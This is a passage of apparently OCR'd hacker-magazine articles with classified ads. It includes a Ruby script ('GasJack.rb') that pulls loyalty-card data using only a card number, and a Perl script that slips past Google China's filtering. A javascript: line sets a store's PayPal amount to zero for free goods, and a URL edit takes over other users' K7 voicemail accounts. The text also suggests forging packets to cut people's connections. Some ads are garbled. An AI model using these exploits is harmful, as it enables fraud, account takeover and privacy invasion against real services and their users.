I did not go after the underlying database of the BonusCard system. I am sure with the lack of security observed, the site is vulnerable to database query injection and XSS attacks. The server is running Cold Fusion and one error message I received was nondescript. I googled it and turned up information about Cold Fusion running on IIS. Again, none of this was relevant to the project, so the details may be fuzzy. I did not loop through massive amounts of BCNs to determine different account types. I merely sampled a few participating friends' BCNs and may have accidentally mistyped a few which led to the identification of the different account types. Failed logins were not investigated as to why they failed, just that they were consistently coming up as failed. Store locator logins were also not further investigated. Updateable accounts were extremely rare, and any found were the same. I suspect these were test accounts. The database contained the first name of the BCN owner and it is reasonable to assume it contains all the information on the BonusCard application form. I am very much still interested in the Giant BonusCard system and all the fun it can provide.
Shouts to milkman for his ruby help and to LV2600.com for putting up with me.
GasJack.rb
require 'socket'
def betweenstrings(searchtext, startstring, endstring, startindex)
  searchtextlength = searchtext.length
  startstringlength = startstring.length
  endstringlength = endstring.length
  if searchtextlength == 0 or startstringlength == 0 or endstringlength == 0
    return ""
  else
    if searchtextlength - (startstringlength + endstringlength) <= 0
      return ""
    else
      startstringindex = searchtext.index(startstring, startindex)
      if startstringindex == nil then
        return ""
      else
        endstringindex = searchtext.index(endstring, startstringindex + startstringlength)
        if endstringindex == nil
          return ""
        else
          betweenstringslength = endstringindex - (startstringindex + startstringlength)
          return searchtext[startstringindex + startstringlength, betweenstringslength]
        end
      end
    end
  end
end
puts "Enter 11 digit BonusCard number"
bcn = gets
sck = TCPSocket.new('www.giantpa.com', 'www')
post_string = "POST /shareddev/Giant_register/login_action.html HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nHost: www.giantpa.com\nContent-Length: 63\nCookie: JSESSIONID=" + bcn + "\n\n" + "F_Username=a&F_Password=a&F_BonusCard=" + bcn + "&Login=Sign+In\n"
sck.print post_string
answer_post = sck.gets(nil)
sck.close
location302 = betweenstrings(answer_post, "location: http://www.giantpa.com", "\n", 0)
location302.chop!
get302_string = "GET " + location302 + " HTTP/1.1\nHost: www.giantpa.com\nCookie: JSESSIONID=" + bcn + "\n\n"
sck = TCPSocket.new('www.giantpa.com', 'www')
sck.print get302_string
answer_get302 = sck.gets(nil)
sck.close
sck = TCPSocket.new('www.giantpa.com', 'www')
getpoints_string = "GET /shareddev/subclub/ HTTP/1.1\nHost: www.giantpa.com\nCookie: JSESSIONID=" + bcn + "\n\n"
sck.print getpoints_string
answer_getpoints = sck.gets(nil)
sck.close
gaspoints = answer_getpoints[/You have \d* Gas Extra Rewards points/]
gaspoints = betweenstrings(gaspoints, "You have ", " Gas Extra Rewards points", 0)
puts gaspoints
by Kcahon
About a year ago Motorola put out a product called the IMfree. It was a wireless instant messenger that connected to a base station on a regular PC. The station communicated with the device over radio frequencies, which gave it a range of about 50 yards. At the time it looked like a good buy and I purchased it for $100. I quickly realized that I had little use for it, as I had access to a machine with AIM on it anyway. Many people must have felt the same way and the price plummeted to around $30. It sat around for awhile until I had an epiphany. Wouldn't this make a perfect iTunes remote?
Several people were already hacking it and I found some message boards that were dedicated to its development. One such forum, http://teknikill.net/bbs/, was especially enlightening. This site had appeared on Hackaday.com and I would occasionally check in to see what was going on. There awaited me the thread "imfree and winamp" which had been posted by a user named Jason. In there it described an ingenious way of having the IMfree communicate with Winamp. The "event" feature in Trillian Pro (a popular IM client) enables a program or action to be executed from any screen name remotely with just a plaintext message. This set off fireworks in my mind.
The next day I opened up iTunes and it hit me. Millions of people use iTunes and rely on it for music. Would I be able to integrate the IMfree with iTunes so that it could play a song, skip to the next song, and do a whole universe of functions? All wirelessly? It was within my grasp. The following are instructions on how to set up your IMfree to interact wirelessly with iTunes. Note that these commands could also be sent via a cell phone or any other mobile device. The possibilities are enormous. This tutorial is meticulous and is intended to make sure that all of it will work properly. If it seems like novice material at times, I apologize. The result is well worth the effort.
1. Create two AIM screen names. If you already have two that is perfectly fine. Designate one to be the receiver on the host PC and one to be logged in on the IMfree.
2. Go to http://maximized.com/download/freeware/scriptsforitunes/setup.exe to download the iTunes scripts that will be executed remotely through AIM. Since the original Winamp plan needed a command line interface, I figured out that these scripts could be executed as well to control iTunes. The scripts were written in VB and are automatically installed in the iTunes directory with an exe file.
3. Download and install the Trillian software. Get a 15 day trial to test out the advanced functions that are needed in this test. Go to Trillian, Upgrade to Trillian Pro, and request an Evaluation Version. Login with the password given through the email and reboot Trillian.
4. Launch Trillian Pro and go to Trillian, Trillian
and click on Plugins. Click on AIM/ICQ and go to Trillian Preferences again and on the right hand side click on Add a New IM Connection. Configure all of your login information for the AIM screen name that will be receiving the data from the IMfree. Login with this screen name on Trillian. For further explanation later on, my fictitious screen name will be called ItunesRemote.
5. Now for the fun stuff. I must give credit to Jason over at www.teknikill.net/bbs/ for giving me the idea and the foundation for the rest of this article. His instructions worked when I tried them, so I am only adapting them a bit to match our iTunes experiment criteria.
6. Go to Trillian -> Trillian Preferences and then click on Advanced Preferences.
7. Click on Automation in the left hand menu.
8. Click Add -> Word Matching.
9. In the Add Word Match Entry box enter the word "launch" in the word text box, check Match Whole Word and check Generate Event, then enter something for the event type (just use "launch" again).
10. Click on Add Event.
11. Next to Action Type change Sound to Execute Program. (You probably see where this is leading to by now. If not, keep reading anyway.)
12. Browse to the location of your iTunes exe file and select it as the program that you wish to execute. It will most likely be in "C:\Program Files\iTunes". Click Set Event.
13. This will take you back to the Match Word Entry menu. Make sure that everything is right and that the word is "launch". Also make sure that the entry type is called "launch". Click Save.
It's now time to cook the shish kabob. Login with your IMfree screen name and IM your other screen name (ItunesRemote) with just the word "launch". Voila, iTunes launches! If your firewall is blocking iTunes from launching, just check Remember This Setting and Allow if you run on ZoneAlarm. Do likewise if you have a different firewall. All that you need to do to play a song, skip a song, etc. is to repeat steps 6-13 by replacing the location of the iTunes exe file with one of the iTunes scripts that was installed originally. For instance, if you wanted to play a song you would have Trillian execute the script called Play in C:\Program Files\iTunes\Scripts, if that's where you put it. Also, remember to type in the word that Trillian will match with the program as Play, so that when you send the message of Play to ItunesRemote, it will execute the script and play the song.
Trillian Pro does not seem to have a limit on the number of commands that it can execute on the host PC. I have about five commands running, including the ability to change the volume, all on my IMfree. The possibilities for this application are limitless. Any application or program for that matter can be launched or executed half a world away with a cell phone. The only setback is that Trillian Pro has a price tag of $25. At least test it out with the trial version and prepare to be amazed. The IMfree can be bought on eBay for about $10 and on Amazon for $30, making this wireless iTunes remote cost between $35-$55.
Imagine queueing up the song "I'll Be Home For Christmas" on your PC in America while sitting in the Tokyo airport with nothing but your cell phone. Please, let the imagination run wild.

by Tokachu
tokachu@gmail.com
When most people think of Internet censorship, they tend to think about China the most. While many other countries have some sort of state-controlled Internet policy, most people would refer to China because of the sheer size of the population and government. Ironically enough, the country with one of the largest Internet populations seemed to go for the lowest bidder when it came to Internet censorship devices, replacing quality control with frantic developers pressed for time.
No matter how strange that may be, it still does not justify a government which wants to keep full control over all media. Which is why I'll tell you, and hopefully a Chinese friend, how the "Great" firewall works and how to keep it from ruining your Internet.
How It Works
Unlike most other countries that simply block all TCP traffic or utilize a filtering HTTP proxy, China relies almost solely on special routers designed to censor based on raw TCP data instead of HTTP requests. The government of China relies on two main methods of censorship: flooding fake DNS requests and forging TCP connection resets.
DNS Poisoning
Very few domain names are actually "blocked" using this method. For a DNS poison to take place, there must be a request for a very, very, very naughty website (like minghui.org) placed. This keeps anyone from figuring out how to connect to, let alone download content from, a forbidden host.
Here's how an uncensored DNS request would look in China:
0.000000 192.168.1.2 -> 220.194.59.17 DNS Standard query A baidu.com
0.289817 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 202.108.22.33 A 220.181.18.114
And here's how it would look if a domain were censored:
0.000000 192.168.1.2 -> 220.194.59.17 DNS Standard query A minghui.org
0.288963 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.289482 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.289838 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.290374 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.290732 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.290757 192.168.1.2 -> 220.194.59.17 ICMP Destination unreachable (Port unreachable)
0.291311 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 169.132.13.103
0.291337 192.168.1.2 -> 220.194.59.17 ICMP Destination unreachable (Port unreachable)
The real reply never gets through because the router forges nearly a half dozen fake DNS replies, along with a few random ICMP messages, to whoever requests a "forbidden" website. This filter only works on UDP port 53 (DNS), which would theoretically make uncensored DNS requests possible if a sufficient number of DNS servers running on ports other than 53 existed.
You can tell if your packets are going through a Chinese router by one simple test. Try performing a DNS query to a remote machine in China. If it doesn't go through, try performing a DNS query for "minghui.org" on the same machine. If you get seemingly random responses, you're routing through China. If you want to determine which router is responsible for the censorship, run a traceroute and perform DNS requests on each hop, starting at the closest. When you get the fake DNS replies, you've found the offending router.
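The signature in the censored capture above (several replies to a single query, conflicting answers, and ICMP port-unreachable messages from the client) can be checked mechanically. The following is an added example, not code from the article: it parses capture summary lines in the format shown above, with the article's two captures embedded as input, and the function name and result fields are assumptions of this sketch.

```python
import re

# Input: the article's two captures, re-typed one packet per line.
CLEAN = """\
0.000000 192.168.1.2 -> 220.194.59.17 DNS Standard query A baidu.com
0.289817 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 202.108.22.33 A 220.181.18.114
"""

INJECTED = """\
0.000000 192.168.1.2 -> 220.194.59.17 DNS Standard query A minghui.org
0.288963 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.289482 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.289838 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.290374 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.290732 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 203.105.1.21
0.290757 192.168.1.2 -> 220.194.59.17 ICMP Destination unreachable (Port unreachable)
0.291311 220.194.59.17 -> 192.168.1.2 DNS Standard query response A 169.132.13.103
0.291337 192.168.1.2 -> 220.194.59.17 ICMP Destination unreachable (Port unreachable)
"""

PACKET = re.compile(r"^(\d+\.\d+)\s+(\S+)\s+->\s+(\S+)\s+(DNS|ICMP)\s+(.*)$")
A_RECORD = re.compile(r"\bA (\d{1,3}(?:\.\d{1,3}){3})")


def analyse(capture):
    """Return one summary dict per DNS query found in the capture text."""
    queries = []
    pending = {}  # (client, resolver) -> summary of the most recent query
    for line in capture.splitlines():
        m = PACKET.match(line.strip())
        if not m:
            continue
        _, src, dst, proto, info = m.groups()
        if proto == "DNS" and info.startswith("Standard query response"):
            # A response travels resolver -> client, so the key is reversed.
            q = pending.get((dst, src))
            if q is not None:
                q["responses"] += 1
                q["answer_sets"].add(frozenset(A_RECORD.findall(info)))
        elif proto == "DNS" and info.startswith("Standard query"):
            q = {"qname": info.split()[-1], "responses": 0,
                 "answer_sets": set(), "port_unreachable": 0}
            pending[(src, dst)] = q
            queries.append(q)
        elif proto == "ICMP" and "Port unreachable" in info:
            # The client's resolver socket was already closed when a late
            # reply arrived: evidence of extra, unsolicited responses.
            q = pending.get((src, dst))
            if q is not None:
                q["port_unreachable"] += 1
    for q in queries:
        # One query should produce one response with one answer set.
        q["suspicious"] = (q["responses"] > 1
                           or len(q["answer_sets"]) > 1
                           or q["port_unreachable"] > 0)
    return queries


if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("injected", INJECTED)):
        for q in analyse(text):
            print(name, q["qname"], q["responses"], q["suspicious"])
```

The check only says that a query drew more replies than a single resolver would send; it does not say which reply, if any, is genuine.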
Forging TCP Resets
If a TCP connection is made from or to a computer in China, the packet data is checked for any "forbidden" words. If the data contains any of those words, the router forges a TCP RST (reset connection) packet. This also triggers a temporary block on TCP connections between those two specific computers. This makes it appear that the server has gone down temporarily.
The list of words not permitted to be used are encoded in GB2312 format, which ensures that businesses with websites in China will not be able to send any illegal content to computers in China (since GB2312 is a character set required to be supported by all applications in China). The filter works thusly:
If the word can be written in pure ASCII, look for the word in any mixture of lowercase and uppercase ASCII letters.
If the word must be written in any combination of CJK ideographs, look for the byte sequence in either raw or URL-encoded GB2312. Hexadecimal strings are also case-insensitive.
Problems
Nearly all the problems of China's firewalls stem from one problem with the routers: they all perform stateless packet inspection. It doesn't matter what protocol the packets are using, nor what computer a packet comes from. All the router is concerned with is finding packets and forging responses, not dropping content.
Unfortunately, that flaw puts the router owners and admins at an extreme disadvantage. Anybody can do a Google search for packet-forging software or libraries (such as libpcap) and whip up a script to flood Chinese routers with fake packets - and the routers will respond, no matter what. It wouldn't be difficult to set up a botnet with DNS request forgers that can send billions of fake DNS requests to various routers, and in return have the victim think China is attacking his or her server! It's also possible to forge a TCP data packet with fake source and destination addresses, which means that if you happened to know the IP addresses of two important diplomats, you could easily cut off their ability to communicate. Popular Chinese websites are just as vulnerable too; email systems could be cut off for hours at a time. The possibilities are endless. The TCP RST timer may be fairly short, but keep in mind that it only takes one fake packet to close a connection.
Getting Around It
The TCP Stack. One way to tell fake RST packets from real RST packets is to look at the time-to-live (TTL) parameter. Forged packets will always have higher TTLs than the real ones. Getting around this, however, would require that both parties have a stateful TTL comparison filter at the kernel level. That's no good.
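The TTL comparison described above can also be run offline as a detection step over recorded packets instead of as a kernel filter. The following is an added example, not code from the article: the packet records are constructed sample data using documentation addresses, and the function name and the tolerance of 2 hops are assumptions of this sketch.

```python
from collections import defaultdict
from statistics import median

# Constructed sample: (time, src, dst, tcp_flags, ip_ttl) as seen at the client.
PACKETS = [
    (0.00, "203.0.113.10", "192.168.1.2", "SA", 47),
    (0.31, "203.0.113.10", "192.168.1.2", "A", 47),
    (0.62, "203.0.113.10", "192.168.1.2", "PA", 47),
    (0.63, "203.0.113.10", "192.168.1.2", "R", 58),    # TTL jumps on the reset
    (5.00, "198.51.100.7", "192.168.1.2", "SA", 52),
    (5.40, "198.51.100.7", "192.168.1.2", "PA", 52),
    (9.00, "198.51.100.7", "192.168.1.2", "RA", 52),   # matches the rest of the flow
]


def suspicious_resets(packets, tolerance=2):
    """Flag RST packets whose TTL differs from the TTL baseline of their flow.

    The baseline is the median TTL of earlier non-RST packets from the same
    source to the same destination. A reset that arrives with a different
    hop count was probably injected by a device elsewhere on the path.
    """
    baseline = defaultdict(list)   # (src, dst) -> TTLs of non-RST packets
    flagged = []
    for when, src, dst, flags, ttl in packets:
        flow = (src, dst)
        if "R" in flags:
            if baseline[flow]:
                expected = median(baseline[flow])
                if abs(ttl - expected) > tolerance:
                    flagged.append((when, src, dst, ttl, expected))
        else:
            baseline[flow].append(ttl)
    return flagged


if __name__ == "__main__":
    for when, src, dst, ttl, expected in suspicious_resets(PACKETS):
        print(f"{when:.2f} RST {src} -> {dst} ttl={ttl} expected~{expected}")
```

A small tolerance absorbs ordinary route changes; a reset with no earlier packets in its flow has no baseline and is not flagged.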
You could, however, rewrite a TCP-based application to send "forbidden" words by using the TCP urgent flag (URG). This only requires that both parties have a modified application - no kernel tweaking necessary. A great example of a program that sends data like that is a proof-of-concept C program called "covertsession" (search for it on Packet Storm Security). It can bypass most stateful packet inspectors, so it easily gets around the stateless inspectors in China. This is probably the best way to modify instant messaging (such as QQ) and IRC applications, assuming one couldn't just use encryption on both ends.
HTTP Traffic. There's nothing really special about how the firewall treats HTTP traffic. Mind you that it only looks for certain strings, no matter where they are. But notice how I said it only uses the GB2312 character set: there's nothing stopping us from simply using UTF-8 instead. You can "switch" your websites from GB2312 to UTF-8 by simply running them through iconv. It's impossible for any UTF-8 sequence to match a GB2312 sequence, even by accident, so you're partially assured good exposure (for a period of time).
Most China-based web hosts, such as Baidu and Yahoo! China, rely on the firewalls to block some content for them. Google China, however, is the one huge exception. Google's Chinese servers are located in the United States and their censorship is done entirely in-house. What does that mean? For one, we don't need to worry about text being sent in GB2312 format (Google insists on using UTF-8). We can also exploit a "feature" in Google's text engine that was overlooked during the Google China development.
Google doesn't compare strings in their text engine like most of us do. Instead of simply comparing bytes, Google considers some words and characters equal to other words and characters that wouldn't match with a byte comparison algorithm. The character equality is what we want to look at here: mainly, how Google considers "fullwidth" ASCII characters (wide, fixed-width characters mostly used in Japanese character sets) equal to their ASCII counterparts. If you were to search for "computers" using fullwidth characters, you'd get the same results as you would with a simple ASCII search (although some ads might not show up).
Now here's where the hack comes in: Google's censors don't look for those fullwidth characters. So, if we were to search Google China for "tiananmen square" using fullwidth characters, the results wouldn't be filtered (the connection may be reset from what Google sends). Luckily, this trick works for Google Images - meaning that it isn't too hard to get Google's cache of images normally unfindable in China!
Here's some sample code to generate fullwidth characters in a shell in Perl (assuming you've got Unicode support in your terminal):
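#!/usr/bin/perl -w
# fw.pl - make text W-I-D-E (convert ascii to fullwidth)
use strict;
# Emit UTF-8 on STDOUT (the "encoding" pragma is deprecated in current Perl).
binmode(STDOUT, ":encoding(UTF-8)");
my $input = $ARGV[0] or die("need one argument for text");
foreach (split //, $input) {
    # ASCII 0x21-0x7E maps to U+FF01-U+FF5E; a space becomes U+3000.
    print(($_ eq " ") ? chr(0x3000) : chr(0xFEE0 + ord($_)));
}
## end script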
Just type whatever search term you want, plug in the output to Google, and watch once-censored search results just show up!
Conclusion
Censorship isn't a profitable business. If China were to release an honest budget (and if people and corporations found out a huge percentage of their GDP was going towards censorship and propaganda instead of food and health care), China's economy would collapse in a matter of hours. Sadly, it isn't just Chinese citizens who believe the lies: corporations like Cisco and Google actually believe you can make money by keeping information from people. The sooner the Chinese people and their government realize this, the better.
(There are far too many people to thank - you know who you are.)
by \ li ndi c8tr
A little while back I stumbled upon a link to the forums of the Korean Friendship Association (http://www.korea-dpr.com/cgi-bin/simpleforum.cgi). Naturally, I thought they needed to hear my opinion on the plight of the people of North Korea. Unfortunately, there is no obvious way of registering for a forum membership without joining their club, nor could I discover any less obvious means to gain access.
Not being content to walk away in total defeat, I decided to examine other parts of the site. After a little research, I discovered that this domain in fact houses the official website of the Democratic People's Republic of Korea. A whois search for the korea-dpr.com domain shows that the server is located in, of all places, Spain.
This seems counterintuitive at first glance. However, this makes perfect sense for a country where information is so tightly controlled that it is a capital crime to own a radio that is not hardwired to receive only the single government-approved station. That the DPRK cannot permit their own government's public website, their equivalent to whitehouse.gov, to be located on a server within its own borders flows naturally from this mindset. Clearly, North Korea isn't a place that is easily targeted by those who would seek to use online activism to further the free flow of knowledge. This is frustrating, because hactivism is one of the few nonviolent routes we have to bring the fight to those who would stifle learning and creativity both at home and abroad.
While we can't pick on Dear Leader directly, someone could hypothetically stick it to his fan club. Using techniques similar to the "Having Fun with Cookies" article in 23:3, a malicious user can use inline javascript in a browser's address bar to get free stuff courtesy of the Korean Friendship Association.
This will require the attacker to set up a throwaway PayPal account or a one-time use credit card. They would also need a little knowledge of Spanish. Don't worry, a hypothetical attacker wouldn't have to spend any real money for this to work.
The KFA online store is located at http://www.korea-dpr.com/catalog2/index.php. Our hypothetical angry activist first should choose something to buy, preferably something expensive. Then he or she would select the "Buy Now!" option, then go on to the checkout. There, the attacker would fill out the information form. If they want to actually receive the stuff and not get busted, they would probably want to use a P.O. box that can't be traced back to them, since most developed countries are still on reasonably good terms with Spain, if not the DPRK. Note that even if one selects payment in U.S. dollars, they will still be billed in euros. Hit continue twice to use the same P.O. box you submitted earlier for your shipping and billing addresses.
The hack is executed on the Order Confirmation form, and it is a simple one. The website uses a POST to send the price info to PayPal in the form of a javascript variable. The price of the first item is stored in the variable document.forms[2].amount_1. If you purchased other items, they'll be stored in amount_2, amount_3, and so on.
Go to the address bar and enter the following:
javascript:void(document.forms[2].amount_1.value="0.00");alert(document.forms[2].amount_1.value)
The alert box isn't strictly necessary, but it is nice to know that the variable was successfully changed. If you bought more than one item, go through and repeat for amount_2, amount_3, and so forth as needed.
All that remains is to confirm your order in the Spanish language form (WTF?) and presto, free North Korean stuff. Maybe such a kick in the pocket book would help the membership of the KFA to see the irony of running an e-commerce website on behalf of a regime that would shoot its own citizens for using a computer or, up until recently, buying things.
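The flaw described above is a checkout that trusts prices sent back by the browser. The following is an added example, not code from the article or from the store: it puts that pattern beside a server-side recomputation. The catalogue, the item_N and quantity_N field names and the function names are assumptions of this sketch; only the amount_N field names come from the article.

```python
from decimal import Decimal, InvalidOperation

# Hypothetical server-side catalogue (constructed): product id -> unit price.
CATALOG = {"flag-large": Decimal("45.00"), "badge": Decimal("6.50")}


class OrderRejected(Exception):
    """Raised when a submitted order cannot be trusted."""


def total_trusting_client(form):
    """Vulnerable pattern: the amount_N fields are whatever the browser sent."""
    return sum(Decimal(v) for k, v in form.items() if k.startswith("amount_"))


def total_from_catalog(form):
    """Hardened: read only item ids and quantities, price them server-side."""
    total = Decimal("0")
    n = 1
    while f"item_{n}" in form:
        item = form[f"item_{n}"]
        if item not in CATALOG:
            raise OrderRejected(f"unknown item in line {n}")
        try:
            qty = int(form.get(f"quantity_{n}", "1"))
        except ValueError:
            raise OrderRejected(f"bad quantity in line {n}")
        if not 1 <= qty <= 100:
            raise OrderRejected(f"quantity out of range in line {n}")
        line_price = CATALOG[item] * qty
        # A submitted amount that disagrees with the catalogue is a tamper
        # signal worth rejecting and logging, never a value to use.
        submitted = form.get(f"amount_{n}")
        if submitted is not None:
            try:
                if Decimal(submitted) != line_price:
                    raise OrderRejected(f"amount mismatch in line {n}")
            except InvalidOperation:
                raise OrderRejected(f"bad amount in line {n}")
        total += line_price
        n += 1
    if n == 1:
        raise OrderRejected("empty order")
    return total


def payment_matches(order_total, processor_reported_amount):
    """Before shipping, compare what the processor says was paid with the
    total computed server-side."""
    return Decimal(processor_reported_amount) == order_total


# Constructed form submissions: one honest, one with amount_1 edited to 0.00.
HONEST = {"item_1": "flag-large", "quantity_1": "1", "amount_1": "45.00",
          "item_2": "badge", "quantity_2": "2", "amount_2": "13.00"}
TAMPERED = dict(HONEST, amount_1="0.00")
```

The second check matters as much as the first: an order is fulfilled only when the amount the payment processor reports equals the server-side total.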
K7 Free [for the taking] Voicemail
by noir
noir.na@gmail.com
K7.net is a site providing free, web-based voicemail and fax services. I'll be specifically addressing the voicemail service in this article, but I have no doubt that the following will apply to the fax services as well. I figured a free voicemail service with no hooks or hidden agendas, what's the harm in trying? This article details exactly the harm found. And for the record, I did email the company expressing my concerns and willingness to help, but shockingly I never heard back from them.
The basics of the service are very simple. You sign up for your free account, they assign you your own phone number and you can now receive voicemails from that number either in your email or by logging into the K7 site. You have the option to either let K7 pick a number for you or search to find a vanity number. When you register, the only information you have to provide is your email address, a four digit security code, how you found their service, and the specifics on how you want to receive your messages. This is when I first started questioning their security practices. Your pin must be four digits exactly and cannot start with a zero. With all 9000 possibilities this provides, somebody would be crazy to think they could have a script brute force an account. No matter, you'll see shortly that the strength of the pin doesn't matter. On to the good stuff.
Let's head on over to voicemail.k7.net to log in and start playing. After logging in, if you click on Check Your Messages, the URL looks something like this:
http://voicemail.k7.net/listen.asp?Phone=YOURNUMBER&newSession=true&sOrder=
Now go ahead and delete your voicemail.k7.net cookie for this session. We certainly don't want the site to think you're trying to change your account when you're trying to change somebody else's. That could be disastrous. The next step is a bit advanced, so hopefully I don't lose any readers with its complexity. Change the phone number in the URL to the number for the account you're interested in. Everyone still with me? If you click on Modify Settings you'll be able to see the user information for whomever has that number. If all the fields on that page are blank it has either not been registered or it's not a number provided by K7. The use of this gaping security hole is clear. If you got a new email and wanted the voicemails sent there but you can't remember your PIN, now you can go in, update your email and change your PIN to something you won't forget so easily next time (you silly goose). Or perhaps you don't want "yourself" to know that you're accessing the account. You can just make sure the account is set to save messages to K7's site and just listen to them on there. I'm sure you can figure out the rest of the possibilities at this point.
I think it's also important to note that K7 is owned by a company who also provides other phone services, including 800 services for businesses. While the security on the other sites may vary, does the fruit fall that far from the tree?
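Two weaknesses are described above: the account shown is chosen by the Phone parameter alone, and the PIN space is only 9000 values. The following is an added example, not code from the article or from K7: it shows the parameter-trusting handler beside one that binds the account to an authenticated session, plus a lockout on failed PIN attempts. The account data, function names and the limit of five attempts are assumptions of this sketch.

```python
import hmac
import secrets

# Constructed accounts keyed by phone number (fictional 555 numbers).
ACCOUNTS = {
    "2065550100": {"email": "alice@example.test", "pin": "4821"},
    "2065550199": {"email": "bob@example.test", "pin": "7310"},
}
SESSIONS = {}        # random session token -> phone number it was issued for
FAILED = {}          # phone number -> consecutive failed PIN attempts
MAX_FAILED = 5       # with 9000 PINs, unlimited guessing cannot be allowed


def login(phone, pin):
    """Return a fresh random session token, or None on failure or lockout."""
    account = ACCOUNTS.get(phone)
    if account is None or FAILED.get(phone, 0) >= MAX_FAILED:
        return None
    if not hmac.compare_digest(account["pin"].encode(), pin.encode()):
        FAILED[phone] = FAILED.get(phone, 0) + 1
        return None
    FAILED.pop(phone, None)
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = phone
    return token


def settings_vulnerable(query, session_token=None):
    """Pattern the article describes: Phone in the URL selects the account
    and the session is never consulted."""
    return ACCOUNTS.get(query["Phone"])


def settings_hardened(query, session_token=None):
    """The session decides whose settings are shown; a Phone parameter that
    names any other account is refused."""
    owner = SESSIONS.get(session_token)
    if owner is None:
        return (401, None)              # not logged in
    if query.get("Phone", owner) != owner:
        return (403, None)              # logged in, but not this account
    return (200, ACCOUNTS[owner])
```

A production service would also expire sessions, require the current PIN for a PIN or email change, and alert the old address when either is changed.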

For Sale
VENDING MACHINE JACKPOTERS. Go to www.hackershomepage.com for EMP Devices, Lock Picks, Radar Jammers & Controversial Hacking Manuals. 407-965-5500
MAKE YOUR SOFTWARE OR WEBSITE USER FRIENDLY with Foxee, the friendly and interactive cartoon blue fox! Not everyone who will navigate your website or software application will be an expert hacker, and some users will need a little help! Foxee is a hand-animated Microsoft Agent character that will accept input through voice commands, text boxes, or a mouse, and interact with your users through text, animated gestures, and even digital speech to help guide them through your software with ease! Foxee supports 10 spoken languages and 31 written languages. She can be added to your software through C++, VB6, all .Net languages, VBScript, JavaScript, and many others! Natively compatible with Microsoft Internet Explorer and can work with Mozilla Firefox when used with a free plug-in. See a R demonstration and purchasing information at www.foxee.net!
TV-B-GONE. Turn off TVs in public places! Airports, restaurants, bars, anywhere there's a TV. See why everyone at HOPE Number Six loved it. Turning off TVs really is fun. $20.00 each. www.TVBGone.com
JUST RELEASED! Feeling tired during those late night hacking sessions? Need a boost? If you answered yes, then you need to reenergize with the totally new Hack Music Volume 1 CD. The CD is crammed with high energy hack music to get you back on track. Order today by sending your name, address, city, state, and zip along with $15 to: Doug Talley, 1234 Birchwood Drive, Monmouth, IL 61462. This CD was assembled solely for the readers of 2600 and is not available anywhere else!
NET DETECTIVE. Whether you're just curious, trying to locate or find out about people for personal or business reasons, or you're looking for people you've fallen out of touch with, Net Detective makes it all possible! Net Detective is used worldwide by private investigators and detectives, as well as everyday people who use to find lost relatives, old high school and army buddies, deadbeat parents, lost loves, people that owe them money, and just plain old snooping around. Visit us today at www.netdive.or.uk.
JEAH.NET UNIX SHELLS SINCE 19 - JEAH's FreBSD shell accounts
continue to D the choice for pance-driven uptimes and a huge
list of virtual hosts. JEAH accounts let you stor data, use IRC, SSH.
and email with complete privacy and security. JEAH also ofers fast.
stable virual wab hosting and complete domain registraion solutions
- including regiion wh masked WHOIS info. Mention Z and
reeive setup waived! Join the JEAH.NET inon!
NETORKING AND SECURI PRODUCTS available at
OvationTehnology.com. W' r a supplier o Networ Security and
Internet Privacy products. Our online stor _ures VPN and firwall
h, wirless harwa". cable and DSL modemsruters. IP access
deviCeS. VIP proucts. pl cl products. and 0Wm.
W pride ourselves on prviding the highest level of technical expertise
and cu satisfaction. Our commRment to you... No surprisesl
Buy with confidence! Security and Privac is our business! Visit us at
http:/www.OvationTehnology.comIstore.h.
PHONE HOME. Tiny, sub-miniature, 7/10 ounce, programmable/reprogrammable touch-tone, multi-frequency (DTMF) dialer which can store up to 15 touch-tone digits. Unit is held against the telephone receiver's microphone for dialing. Press 'HOME' to automatically dial the stored digits which can then be heard through the ultra miniature speaker. Ideal for E.T.'s, children, Alzheimer victims, lost dogs/chimps, significant others, hackers, and computer wizards. Give one to a boy/girl friend or to that potential 'someone' you meet at a party, the supermarket, school, or the mall; with your pre-programmed telephone number, he/she will always be able to call you! Also, ideal if you don't want to 'disclose' your telephone number but want someone to be able to call you locally or long distance by telephone. Key ring/clip. Limited quantity available. Money order only. $24.95 + $3.00. Mail order to: PHONE HOME, Nimrod Division, 331 N. New Ballas Road, Box 410802, CRC, Missouri 63141.
REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the like? H the all-new A SS~, a guidebook to the art of urban exploration, from the author of Infiltration zine. Send $20 postpaid in the US or Canada, or $25 overseas, to PO Box 13, Station E, Toronto, ON M6H 4E1, Canada, or order online at www.infiHration.or.
ENHANCE OR BUILD YOUR LIBRARY with any of the following CD ROMS: Hack Attacks Testing, Computer Forensics, Master H W Spy 2001, Hacker's Handbook, Troubleshooting & Diagnostics 98, Forbidden Knowledge 2, Troubleshooting & Diagnostics 2002, Police Call Frequency Guide 2nd Edition, Computer Toybox, Answering Machine 2000, Hackers Encyclopedia 3, Maximum Security 3rd Edition, Network Utilities 2001, Screensavers 2002, Engineering 2000, Anti-Hacker Toolkit 2nd Edition & PC Hardware. Send name, address, city, state, zip, email address (for updates only) and items ordered, along with a cashier's check or money order in the amount of $20 for each item to: Doug Talley, 1234 Birchwood Drive, Monmouth, IL 61462.
